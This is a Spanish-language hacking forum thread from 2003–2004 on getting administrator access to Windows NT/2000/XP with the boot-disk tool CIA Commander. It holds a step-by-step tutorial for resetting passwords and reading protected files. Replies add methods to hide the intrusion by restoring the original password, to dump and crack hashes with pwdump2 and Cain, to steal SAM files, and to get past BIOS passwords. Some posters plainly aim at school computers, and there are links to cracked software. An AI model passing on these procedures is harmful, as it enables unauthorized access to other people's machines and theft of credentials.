Foro de elhacker.net

Seguridad Informática => Seguridad => Mensaje iniciado por: Azazel en 17 Septiembre 2003, 19:28 pm



Título: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Azazel en 17 Septiembre 2003, 19:28 pm
Bueno, posteo esto porque estoy realmente decepcionado de la facilidad con la cual se puede acceder localmente a un sistema XP/NT/2000.

A raíz de un post que está ahora pegado en la sección de Windows, me he enterado de la existencia de un programa que se llama Cia Commander y tan solo ocupa 358 kb.

Este programita tan pequeño y que se puede descargar con facilidad desde el Emule me ha permitido crear un disco de inicio para sistemas basados en NTFS, mediante el cual he podido acceder a todos los archivos de cualquier partición, incluyendo los que se encontraban en carpetas encriptadas con el Tweak-xp y con el hide folders. También he accedido a las carpetas de administradores que habían sido definidas como privadas, y he podido copiar los archivos a floppy o a otra particion

Con este mismo programa he podido ver a todos los usuarios registrados y cambiar la pass de administrador(o cualquier pass) en mas o menos 20 segundos, entrar al sistema y después restaurarla en 20 segundos mas.

Realmente estoy decepcionado y asqueado por la total falta de seguridad de NTFS y escribo este post para que todo el mundo tome conciencia de ello.

Bill Gates, tu Windows es una porquería  :)

Saludos


Título: Viva Venezuela .
Publicado por: pollodelelo en 19 Septiembre 2003, 10:43 am
hola, compatriota, esta bueno tu articulo  mi pregunta es la siguiente.... como te puedes bajar ese programa gratis, por que me meti en la pagina principal de cia commander y creo que el programa es pago......
si pudieras explicar de donde lo puedes bajar gratis seria buenisimo...
gracias


Título: Re:Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: BASIC CAOS en 19 Septiembre 2003, 11:38 am
http://www.sharereactor.com/download.php?id=47875

Sera este el link? no estoy pudiendo bajarlo de ningun lado
Me pasas la Data ya lo busque bastante .Gracias

Salu2


Título: Re:Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Charlie en 20 Septiembre 2003, 11:39 am

Este programita tan pequeño y que se puede descargar con facilidad desde el Emule me ha permitido crear un disco de inicio para sistemas basados en NTFS...

Creo q dice bastante claro desde donde lo ha bajado...


Título: hey pero donde conssigo esa baina ?¿
Publicado por: pollodelelo en 20 Septiembre 2003, 13:46 pm
epale que es un emule, por que dicen que se lo han bajado desde un emule que coño es eso tios ?

hablenme !!!!!!!


saludos.


Título: Re:Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Ðevastador en 20 Septiembre 2003, 13:48 pm
eMule: Una aplicación para compartir archivos con otros usuarios vía p2p. Muy parecido al KaZaA y el iMesh. En Europa es más popular que en América Latina. Acá son más famosos los mencionados anteriormente.

www.softonic.com <- Ahí encuentras el famoso eMule.


Título: tio cual me recomiendas tu
Publicado por: pollodelelo en 20 Septiembre 2003, 13:55 pm
gracias por responder tan rapidamente te queria hacer unapregunta que  emule utlizas tu, oseas cual me puedo bajar que consideres bueno y gratis...

gracias de nuevo


Título: Re:Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Ðevastador en 20 Septiembre 2003, 14:11 pm
Todos lo eMules son gratis. Pero yo no uso ninguno de esos. Yo uso el KaZaA Lite y el Clean iMesh en conjunto. Ahí encuentro todo lo que quiero. Los puedes bajar de www.softonic.com.. Pero creo que los links están rotos. Búscalos con los mismos nombres que te di en el Google  ;)


Título: Re:Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: NaPa en 23 Septiembre 2003, 22:25 pm
jaja Eso no e snuevo y existe desde el NT 4 y funciona hasta el 2003 y el cia commander solo e suna herramienta shreware hay muchas otras creadas por hackers como el cd linux boot ntfs, o el NTFS Dos (mas barato) o simplemente escriban su codigo para hacerlo no es tan dificil la seguridad de un win la vuela cualquier persona en menos d eun minuto..


Título: Re:Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Meta en 16 Octubre 2003, 11:40 am
Yo puse un post sobre windows de que se me reinicia solo y se me cuelga solo y estaba cabreado con Bill GATE y su windows. ¿Crees que Bill Gate le importa algo que le diga que su windows es una porquería? El tio está forrado y le importa una ***** todo.

Y lo de la seguridad es una verdad que está ahí. Todos los archivos de seguridad que se protege siempre es quebrantado. Dice un refran:

Si hay un hombre capaz de crear una super mega seguridad de algo, siempre hay otro capaz de quebrantarla o lo mas que se suele decir por ahí:

El que inventó la ley inventó la trampa.



Título: Re:Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Azazel en 23 Octubre 2003, 18:54 pm
Me decido a publicar este pequeño tutorial para que ya no me pregunten por el privado, a ver si les resuelve las dudas:

Tengan presente que a pesar de su potencial como herramienta hacker, este programa está pensado mas bien para todos aquellos que por alguna razón han olvidado su password de administrador(esto es lo que dice datapol, yo no entiendo bien como alguien podría ser tan pero tan....bueh, vamos a dejarlo así) o cuyos sistemas están infectados por algún virus particularmente destructivo y no se quieren arriesgar a arrancarlo normalmente sin antes remover el virus.

Nombre del programa: DATAPOL CIA COMMANDER
Sistemas operativos: NT/XP/2000/2003 (Nota: funciona únicamente sobre particiones NTFS)
Web oficial: http://www.datapol.de/en/index.htm

Desde la web oficial nos podemos bajar un demo que no es plenamente funcional así que no sirve de mucho. Además para hacerlo hay que rellenar un formulario muy fastidioso y que nos quita mucho tiempo.
Si así lo desean pueden buscar el programa completo aqui (http://www.trucoswindows.net) o bajarlo con su cliente P2P favorito.
Para los que usan el Emule el E-link desde el cual lo he bajado yo es :

ed2k://|file|Cia.Commander.exe|1491644|492B55BBE7575753B9E22D17072B3D17|/

Si para cuando lean esto ya el E-link no funciona el nombre completo del programa es DataPol Cia Commander, lo mejor es bajarse la versión Self Extractor (.exe) que ocupa 1.42 Mb y no creo que cueste mucho trabajo encontrarlo.

Una vez que hayamos bajado nuestro archivo, lo ejecutamos y este nos creará una carpeta con el nombre CIA Recovery Floppy GUI Setup

Entramos a la carpeta, insertamos un disquete recién formateado en nuestra unidad y ejecutamos el CIA Recovery Floppy GUI Setup.exe

Ya tenemos listo nuestro floppy de arranque. Lo dejamos puesto y reiniciamos el ordenador.

Al arrancar desde el floppy nos saldrá un menú preguntando en que disco lo queremos usar. Seleccionas el disco y nos pregunta en que partición NTFS lo queremos usar. Elegimos la partición que contiene el sistema operativo y se nos presenta un menú con 4 opciones:

File Manager (operaciones sobre archivos)
User Manager(operaciones sobre usuarios)
Registry Editor(editor de registro)
Reboot(reiniciar)

(http://usuarios.lycos.es/mipaginaestupida/ElementosActivos/forot/ciasm1.gif)

Elegimos File Manager.

Como bien dice el nombre esta opción nos da la posibilidad de trabajar con los directorios y archivos de la partición que hemos escogido y nos permitirá ver absolutamente todos los archivos presentes en la partición, también los que se encuentran en carpetas escondidas con programas tipo hide folders, así como trabajar libremente con ellos. La única excepción la constituyen los archivos cifrados por ejemplo con EFS que podremos borrar pero no editar.

(http://usuarios.lycos.es/mipaginaestupida/ElementosActivos/forot/ciafm1.gif)

Los comandos disponibles son.

F1 >>> Suministra ayuda sobre las teclas y sus funciones
F2 >>> Información adicional sobre el archivo o carpeta que hemos seleccionado, como lo son: Tamaño del mismo, atributos, ultima modificación, etc.
F3 >>> Nos permite editar el archivo que hemos seleccionado. Lo podemos editar tanto en formato texto como en formato hexadecimal. No funciona para archivos cifrados.
F4 >>> Nos permite crear un nuevo directorio.
F5 >>> Permite copiar algún archivo a un floppy.
F6 >>> Permite renombrar un archivo o directorio.
F8 >>> Permite borrar un archivo o directorio.
F9 >>> Permite insertar un archivo en algún directorio.
F10 >> Salir de File manager

Pisamos F10 y nos metemos ahora en User manager.

Tendremos entonces que indicarle al programa cual es el directorio del sistema operativo.
Será normalmente c:\Windows o es c:\Winnt
Seleccionamos el directorio correcto y pisamos la barra espaciadora.

Nos presenta un listado de todos los usuarios, seleccionamos el que nos interese y pisamos Enter.

Si la cuenta está protegida con pass, se nos preguntará si queremos removerlo, vamos a decirle que no, a no ser que tan solo quieran hacer eso.

Abajo nos aparecerán informaciones adicionales sobre el usuario como el nombre completo y los comentarios, siempre y cuando el usuario los haya introducido.

(http://usuarios.lycos.es/mipaginaestupida/ElementosActivos/forot/ciaum1gif)

Los comandos disponibles son.

F1 >>> Suministra ayuda sobre las teclas y sus funciones
F2 >>> Nos permite salvar el pass actual del usuario que hemos seleccionado en un disquete
F3 >>> Nos permite cambiar el pass del usuario seleccionado por el que mas nos guste.
F6 >>> Nos permite restaurar el pass del usuario seleccionado, siempre y cuando lo hayamos previamente salvado, obviamente, los milagros no los hace el programa por ahora.
F10 >> Salir de User Manager.

Pisamos F10 y nos metemos ahora en Registry Editor.

Aquí también le tendremos que indicar al programa cual es el directorio del sistema operativo y pisar la barra espaciadora, a no ser que ya lo hayamos hecho antes desde el User Manager y entonces ya no será necesario volverlo a hacer.

Como lo dice el nombre el Registry Editor nos brinda la posibilidad de trabajar el registro de Windows.
Por ejemplo podemos seleccionar Software>>Microsoft>>Windows>>CurrentVersion>>Run y podremos ver cuales programas arrancan con nuestro sistema operativo, muy útil si nos has caído algún virus particularmente destructivo y no queremos arriesgarnos a arrancar nuestro sistema.

(http://usuarios.lycos.es/mipaginaestupida/ElementosActivos/forot/ciarm1.gif)

Los comandos disponibles son.

F1 >>> Suministra ayuda sobre las teclas y sus funciones
F2 >>> Suministra información adicional sobre la entrada de registro que hayamos seleccionado
F3 >>> Nos permite editar el valor de registro que hayamos seleccionado
F5 >>> Nos permite copiar el valor de registro que hayamos seleccionado adonde queramos copiarlo.
F6 >>> Nos permite renombrar la entrada de registro seleccionada.
F8 >>> Nos permite borrar la entrada de registro seleccionada.
F10 >> Salir de Registry Manager

Espero que hagan buen uso de la información.

He publicado ente pequeño tutorial en estos 2 foros:

http://www.elhacker.net/foro/
http://www.trucoswindows.net/foro

Así que ya sabes, si lo estás viendo en uno de estos 2 foros, visita también el otro, los 2 son excelentes.

Saludos


Título: Re:Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Libransser en 23 Octubre 2003, 21:27 pm
Una duda, tengo W98, ¿para poder usar el programa y hacer el diskete de arranque tengo que tener también el Windows XP/NT/2000/2003?

Y también, dices que dejemos el disco en la disketera y que reiniciemos, ¿cuando reiniciemos tenemos que entrar a la BIOS y configurar para que arranque del diskete? ¿O arranca sin necesidad de hacer este cambio?

Arwing


Título: Re:Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Azazel en 23 Octubre 2003, 21:37 pm
Tengo entendido que el disco de arranque se puede crear tambien desde Windows 98 o desde Windows Me, pero como no los tengo instalados ni los pienso instalar  ni los quiero usar nunca jamas porque los detesto a los dos no te lo puedo confirmar xDDDD.

No tienes que tocar absolutamente nada en la Bios, a no ser que la tengas configurada para arrancar desde el Hard Disk antes que desde el floppy, cosa de la cual dudo porque sería bastante absurdo.

Normalmente hoy día el arranque es floppy>>Cd>>Hard disk, si no lo tienes así y no te arranca obviamente tendrás que modificar el orden para poner el floppy primero.

Saludos


Título: Re:Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: jedi en 28 Octubre 2003, 17:57 pm
 :P

si alguien no a encontrado la version completa del cia commander yo tengo un pequeño crack por asi decirlo que copia un archivo a tu disco de inicio del cia commander haciendo que tengas todos los privilegios de cambiar passwords, etc si quieren agregarme a su msn y se los paso con mucho gusto  :D


Título: Re:Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: jedi en 28 Octubre 2003, 18:02 pm
disculpa "alnitak" si ya no quiero el programa en mi pc como lo desinstalo o borro ya que no encuentro ninguna carpeta o registro en windows espero tu respuesta pronta.

gracias y saludos por aca :P


Título: Re:Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: ramonsoft en 29 Octubre 2003, 08:19 am
es nesesario hacer un disco de arranque???


Título: Re:Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Azazel en 29 Octubre 2003, 10:24 am
Vamos que está suficientemente explicado.

Jedi, no encuentras nada en el registro ni carpetas de instalación porque no has instalado nada, así que no hay que desinstalar absolutamente nada, si ya no lo quieres borra el self extractor y formatea el floppy.

ramonsoft te has tomado la molestia de leer lo que he colocado ??

Citar
Entramos a la carpeta, insertamos un disquete recién formateado en nuestra unidad y ejecutamos el CIA Recovery Floppy GUI Setup.exe

Ya tenemos listo nuestro floppy de arranque. Lo dejamos puesto y reiniciamos el ordenador.

Me parece obvio no ??

Saludos


Título: Re:Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: jedi en 29 Octubre 2003, 17:09 pm
 8)  gracias alnitak........  :D


saludos cheeesss


Título: Re:Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: ramonsoft en 31 Octubre 2003, 05:53 am
a yap


Título: Re:Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: NaPa en 3 Noviembre 2003, 14:18 pm
en hackers.com.mx hay un tutorial sin programas de Hackersoft de como violar la seguridad de windows de varias formas, me falto una del IIS local pero luego loa ctualizo.


Título: Re:Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: LoupNoir en 20 Noviembre 2003, 16:15 pm
aqui esta el crack y no se baja del mugroso  EMULE
http://www.cracks.am/cracks/c7.html


Título: Re:Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: fritz en 5 Diciembre 2003, 10:01 am
He bajado el demo del programa Cia Commander y encontré el crack. He probado el programa y todo funciona perfectamente excepto que con F5 no puedo copiar ningun achivo a una unidad que no sea A:  Alguien me pudiera explicar como hacerlo.


Título: Re:Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Excalibur en 5 Enero 2004, 13:57 pm
Interesante el soft del q hablais, pero azazel, como administrador de sistemas q soy, t digo q necio es el q hoy en dia deje bootear su pc o su servidor desde la torre de floppy primeramente, y ademas el setup siempre tendra un passw, asi q como ves no es tan facil como creeis, no obstante he sabido de las famosas hotkeys para diferentes motherboard, siempre he querido esa info y nunca la he encontrado, para los q no saben, las hotkeys son combinaciones de teclas q t permitan saltarte el passw del bios y acceder al setup al toque...si alguien sabe esa info, por favor pasemela.


Título: Re:Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: NaPa en 6 Enero 2004, 08:18 am
Es mas facil sacar el password del bios, no necesitas privilegios administrativos, y desde iwndows o ms-dos sacas el bin te lo llevas y lo desencryptas. de hehco hay varios programas que ya lo haces ami bios cracker es bueno aunque hay algunos con mejor GUI


Título: Re:Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Parasito en 15 Enero 2004, 09:51 am
http://www.matcode.com/ciainst.exe


Título: Re:Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: kanitro77 en 16 Marzo 2004, 17:52 pm
Hola, sobre algo parecido, tengo un problema....tengo dos discos duros en el pc, en uno tenia instalado el winXP, yo era el administrador y lo tenia con clave de acceso, unos archivos del win se borraron y no lo pude reparar...decidì instalar en el otro disco duro el winxp...todo bien, recuperè los archivos de los otros usuarios, pero no mis documentos, ya que porque estaban con clave me sale "acceso denegado", como puedo obtener esas carpetas?...si alguien me puede ayudar gracias


Título: Re:Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Alnitak en 19 Marzo 2004, 04:08 am
Necesitas cambiar los permisos de la carpeta para poder acceder a ella, si tu Xp es Pro lo tienes explicado aqui (http://www.elhacker.net/foro/index.php/elhackernet/t18479.htm) y si es Home Edition es un poco mas complicado y lo tienes explicado aqui (http://www.trucoswindows.net/foro/index.php?showtopic=241)


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: calisin_vargas en 11 Abril 2004, 20:10 pm
hola amigo te doy la razon
el windows es una porqueria yo trabajo con sistema linux que es mucho mejor....
pero dime cual es ese programa
soy administrador de sistemas
espero que me lo mandes te agradecere
Good Bye
gracias

te dejo mi correo:

m_calisin_v@hotmail.com

gracias



Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Un4given en 12 Abril 2004, 01:16 am
yo solo tengo una pregunta, como puedo hacer para que no puedan usar el programa, algo para contrarestarlo o algo asi, muchas gracias por sus respuestas


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Kasty en 13 Abril 2004, 14:25 pm
Hola :)

Yo probé hace algun tiempo este programa con windows 2000 xq no me acuerdo d la contraseña q le puse! y el programa me permite guardar la contraseña (cifrada), mi duda es podría guardar dixa contraseña en un disket y una de dos: desencriptarla o mejor poder cambiarla y luego poner la q tenia antes guardada en el disket??? Si alguien sabe eso xfavor necesito entrar como administrador y no querria cambiar la contraseña, si no saber la q tiene. Gracias d antemano. contagioneumoniaatipica@hotmail.com  ;)


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Alnitak en 21 Abril 2004, 05:51 am
para averiguar la contraseña usa el Cia para cambiar momentaneamente la cuenta de administrador por defecto o una de las cuentas de administrador si hay varias, despues robate los hashes desde el registro usando por ejemplo pwdump2 o otra herramienta de las muchas que hay, y desencriptalas con el Cain(obviamente la que has cambiado no la obtendras).

Despues restaura el pass original con el mismo Cia(deberás haberlo previamente salvado en el floppy) y nadie se enterará.

No intentes usar el Cia para robarte el SAM directamente ya que no podrás hacer nada con el debido a que los hashes allí contenidos tendrán doble encriptacion( esto hasta que alguien de los que andan sugiriendo este metodo me demuestre que le ha funcionado)


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Un4given en 22 Abril 2004, 21:39 pm
alguien sabe como hacer para que no puedan usar el Cia commander en la computadora, alguna manera para que el disco de arranque no funcione?? si es asi se los agradeceria mucho.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: rieb en 29 Abril 2004, 09:37 am
alguien sabe como hacer para que no puedan usar el Cia commander en la computadora, alguna manera para que el disco de arranque no funcione?? si es asi se los agradeceria mucho.

Haz q tu pc no sea booteable dsd cualkier unidad protegiendo mediante passwd el acceso a la bios


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: SNAKE28 en 29 Mayo 2004, 07:33 am
Ya he usado el cia self extractor es muy bueno
luego que entre al winnt me manda los usuarios y bueno
tiene que estar el administrador solo tengo que buscarlo.
bueno cuando lo copio en el disco d me trae en formato texto y esta raro eso que se hace con eso.
se que hay que desencriptarlo como yo se que lo que hay que descifrar y como tambien cual programa se usa ya que he utilizado el lc5 que es el que me manda la pagina
cuando lo instale me manda un mensaje.
dice ,the installshiel engine (ikernel.exe9 could not be launche. class not registered. ok
pordonde empiezo. sinceramente gracias


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Alnitak en 29 Mayo 2004, 08:46 am
Si el sistema es winnt no necesitas ni usar el CIA, ya que en esta version de Windows todavia no está implementado el SYSKEY.

Puedes robarte directamente el SAM y si no te va el lc5 intenta con el Cain que es igual de bueno.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: uNi0N_KaoZ en 12 Agosto 2004, 01:01 am
Holas! ;D
  Perdonen la ignorancia...
Tengo una dudita respecto a lo del archivo 'SAM'..
Todavia no me entra bien ese tema...  :(  :'(

Lo que quiero hacer es sacar los 'hashes' para despues desencriptarlos..
   Lo que hice fue lo sgte:
Entré al CIA, despues me metí a 'User Manager'(como dice el manual), le dí a F2 para salvar el 'pass' en un diskette...
 Despues, voy al diskette, y tengo los archivos siguientes:

- ODA01F4

Para poder ver la contraseña, qué tengo que hacer..?
Tengo el Cain y el LC5...
He tratado inventando  :-[ y no consigo nada...  :'(
Podrían ayudarme...?
Nota: tengo WinxpPro...

Perdonen y Saludos...
De verdad perdonen...  :'(


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: icisneros en 12 Agosto 2004, 10:17 am
Pues creo que el cia no guarda los pass como sam (no estoy seguro) entonces lo que creo que debes hacer es entrar como admin al pc y copiar los sam al diskete y luego reestablecer el pass otra vez. Te digo esto porque supongo que el cia guardara los pass en otro formato, pero ya te digo que no estoy seguro, porque tu dices que el archivo que te aparece en el diskete no es un sam verdad??

Saludos!!


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: uNi0N_KaoZ en 12 Agosto 2004, 11:35 am
Hola de nuevo! ;D
Si, es lo que digo... ::)

Entonces lo que quiero saber es cómo saco la pass del administrador..? :-\
No la quiero cambiar, sino saberla... :P
[tengo todas las herramientas (creo) pero no sé usarlas...] :'(

Saludos...

[eK]


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Alnitak en 13 Agosto 2004, 06:51 am
Usa el Cia para cambiar el pass

Entra como admin y crea una nueva cuenta de admin para usarla despues

Restaura el pass original con el CIa

Entra como admin desde tu nueva cuenta y usa pwdump2 para robarte los hashes desde el registro

Usa el cain u otro programa equivalente para crackear el hash del admin

Olvidate de robarte el SAM porque no sirve de nada


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: uNi0N_KaoZ en 14 Agosto 2004, 02:12 am
Muchísimas Gracias Alnitak...
  Por toda tu paciencia..  :P

Gracias por todo..
Saludos..

[eK]


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: sedoro en 20 Agosto 2004, 01:13 am
Hay una mini ditro de Linux creada sólo para esto, subsituir el archivo SAM por otro creado por la distro con el password que le digas. Sale explicado en la revista número 17 de Hack X Crack o PC Paso a Paso.  Las imagenes de Disquete y CD-Rom las podreis encontrar en www.hackxcrack.com o http://home.eunet.no/~pnordahl/ntpasswd

Saludos,
SeDoRo


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: ۞GЯ!m ŖЭДрЭ®۞ en 2 Septiembre 2004, 02:59 am
Jedi ya que has dicho que poseer el crack, desearia que me lo enviaras a vituper08@hotmail.com, si no te llega alli entonces lo envias a Linkin_JoeHahn@hotmail.com, te estare eternamente agradecido ;D


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: syaksic en 2 Septiembre 2004, 10:21 am
holas bueno tengo el cia pero no puedo usarlo pq las pcs de mi cole tienen windows 2000 pero con particion fat y queria saber si me pueden explicar (detalladamente pq soy medio imbesil) que hacer para transformar de fat a ntfs o quizas usar otra version de cia commander y que asi me funcione (quiero entrar como administrador para instalar direct x)


Título: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: kill3r97 en 2 Septiembre 2004, 14:08 pm
bueno la conclusion final de esto es que no hay forma de proteger nuestro sistema aun si cambias la config del bios para no bootear y lo protejes con password existen varios crackeadores de PASSWORD para bios todo va en saber que tipo de board es por lo general la referencia sale al final de la pantalla de inicio de la board en modo texto lo dificil seria encontrar la referencia si el bios esta protegido por contraseña y configurado para iniciar en modo grafico (como las board intel o msi que aparece el logo de pentium cuatro o el chipset corecell en la board msi kt6v) en ese caso podriamos probar con el dxdiag en el windows o el nero en este momento no recuerdo pero ahi una aplicacion de ahead que permite obtener la referencia de la board.

con esta referencia proba en google y encontraras los passwords de fabrica del bios es decir la lista de passwords que funcionaran siempre en esa board o algun crack para la version de tu bios para obtener el password.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Griph en 7 Septiembre 2004, 13:18 pm
Una vez más se comprueba y demuestra la ineficacia e inseguridad de windows.

Saludos.


Título: no digan barbaridades
Publicado por: kill3r97 en 9 Septiembre 2004, 04:37 am
he leido  varios posts en donde dice no te robes la SAM que no sirve para nada lo cual es ridiculo hace ya mucho tiempo se logro descifrar las syskey y existen muchas aplicaciones para hacerlo

se roba la SAM del config y el archiivo SYSTEM y con algun desencriptador como SAM INSIDE tendra la hashe y podran crackearla con fuerza bruta o un diccionario o meterla a las tablas de hashes del LC5.



Título: Re:Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: DFP en 10 Septiembre 2004, 19:21 pm
HOLA , NO ME QUEDO CLARO ESTE PROGRAMA, MUESTRA LA CLAVE DEL ADMINISTRADOR DEL WIN200.
ME CONTESTAS PORFA : dfp8dfp@yahoo.com


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: [P h i l i p s] en 11 Septiembre 2004, 21:47 pm
Para todos aquellos que no encuentren el cia commander decir k esta en www.trucoswindows.net (hay que regstrarse pero es gratis), que conste que no es para hacer publicidad de dicha web, si por alguna razon incumplo alguna norma del foro pido disculpas y borrare post inmediatamente. En segundo lugar me gustaria preguntar como robar la sam....? porque la el cia commander guarda el archivo .usr y el lc5 no lo reconoce.


Título: por que no consultan
Publicado por: kill3r97 en 12 Septiembre 2004, 17:04 pm
miren no se los que estan comenzando pero no preguunten lo mismo uuna y otra vez una y otra vez en todos los foros el mismo post por alguien una y otra vez.

acaso preguntas como robar la sam, has consultado algo esta misma pagina te has tomado la molestia de visitarla no lo creo por que si fuera asi hubieras leido varios manunales de hacking en 2k.

y no estarias preguntando si no respondiendo


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: [P h i l i p s] en 12 Septiembre 2004, 19:21 pm
De verdad que me sorprende que la gente vaya tan de lista. Quien te ha dicho a ti que no haya buscado, yo siempre busco todo antes de preguntar lo que pasa es que si no se como robar la sam tampoco se que eso esta en un manual de hacking en 2k, =mente gracias por la informacion mirare ai.  ::)


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: [P h i l i p s] en 12 Septiembre 2004, 19:26 pm
POs ya sta lo que tu kerias kill3r97 respondo a mi misma pregunta http://foro.elhacker.net/index.php/topic,12434.0.html. Yo habia puesto en buscar robar sam y otras palabras clave y no abia llegado ai, cierto que tambien error mio por no haber mirado en el apartado de manuales, pero xfavor aver si dejamos de juzgar a la gente sin saber.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: [P h i l i p s] en 15 Septiembre 2004, 02:37 am
Si lo k kieres es sacar la contraseña para guardarla en un floopy y luego poder restaurlarla, la manera de hacerlo es marcando sobre la carpeta windows pero en vez de darle al enter le das al space....creo k te referias a eso.   ::)


Título: Que hago???
Publicado por: syaksic en 22 Septiembre 2004, 00:06 am
bueno yo saque la sam muy fasil (los pc de mi colegio tienen fat32 entonces entre con un disco de inicio y copie todo lo q decia a un diskete) pero luego no se como desencriptarlo (uso brute force pero me dice q en unos lindos 1.487.973 años estara listo (no puedo esperar tanto ademas creo q para esa fecha ya no tendran 2k en mi colegio) y bueno la cosa es q archivo necesito para simplemente copiar lo q dice en el sam y q me salga traducido.
trate tambien de sobreescribir sam pero lo unico q logre fue dejar el computador inutil


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: sroot en 23 Septiembre 2004, 09:02 am
Pero como se hace para crackear el pass de root q conseguimos y guardamos en un diskete (el manual dice que usemos el cia commanderpwd.exe y me maté buscando por la web pero no se encuentra), xq los guarda como archivos .usr
Gracias ;)


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: GreatSaiyan en 26 Septiembre 2004, 06:06 am
Disculpen, que hago si el windows xp fue instalado sobre una particion en FAT32 ? el Cia comander Me dice que no puede leer mas que particiones NTFS, lo mismo me pasa con:Petter Nordahl-Hagen's Offline NT Password & Registry Editor, Openwall's John the Ripper, EBCD – Emergency Boot CD y con el Austrumi, alguien tiene una idea de lo que debo hacer ?

Espero puedan ayudarme y agradezco sus comentarios de antemano.



Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: javnca en 28 Septiembre 2004, 04:50 am
Existen muchas maneras de entrar a win 2k como administrador, pero sin lugar a dudas el Cia Commander es lo mejor, ya salio una version nueva, Cia Commander v2 que permite leer particiones FAT inclusive, recuerden  que la herramienta puede hacer muchas otras cosas mas....


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: syaksic en 28 Septiembre 2004, 05:09 am
si salio el cia commander v2 pero este sirve con cd el cual hay q perforar y es todo extraño.
claro q si conoces una forma de q funcione sin ese ritual raro de grabado en cd dvd perforado dimelo  pq lo del cd no me funko a mi


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: MarvinCrack en 28 Septiembre 2004, 07:44 am
Amigos

De hecho que sirve, conpruebenlo ustedes mismos.

Aqui esta un link gratis al programa

http://www.emulesoft.com/descargas_directas-file-761.html

 :o


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: syaksic en 28 Septiembre 2004, 10:39 am
pero el cia commander 1 no sirve con fat32!


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: bimbache en 29 Septiembre 2004, 10:21 am
me han instalado Xp 2000 y no se que he podido hacer pero ahora no tengo los privilegios del adminitrador para entrar en mis archivos etc. sos gracias


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: v_nom70 en 30 Septiembre 2004, 13:08 pm
umm, dejenme decirles algo, una cosa es ser noob y otra ser demasiado estupido, cualquier persona que haya leido el tutorial sin necesidad de mucha materia gris, sabe hasta como reiniciar por un disquette y cosas asi que por logica se saben.

ahora, lo que no dicen y lo que es realmente dificil es entender el codigo de la sam ya que al parecer esta cifrado, claro lo puedes modificar con el cia pero la verdadera pregunta es ¿que exactamente puedo cambiar del codigo de la sam?........segun veo esta en hexadecimal y es un poco extenso ya que por prueba he creado varios usuarios y el codigo se hace mas complejo.

soy noob y estoy aprendiendo lenguaje c, c++ y asm.
---------------------------------------------------------------
No quiero que se ofendan ni que me ataken, solo que estudien un poco, ya que hay cosas que se aprenden en libros viejos, y no siempre conseguiran un tutorial que les explique todo por completo.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: syaksic en 1 Octubre 2004, 04:44 am
umm, dejenme decirles algo, una cosa es ser noob y otra ser demasiado estupido, cualquier persona que haya leido el tutorial sin necesidad de mucha materia gris, sabe hasta como reiniciar por un disquette y cosas asi que por logica se saben.
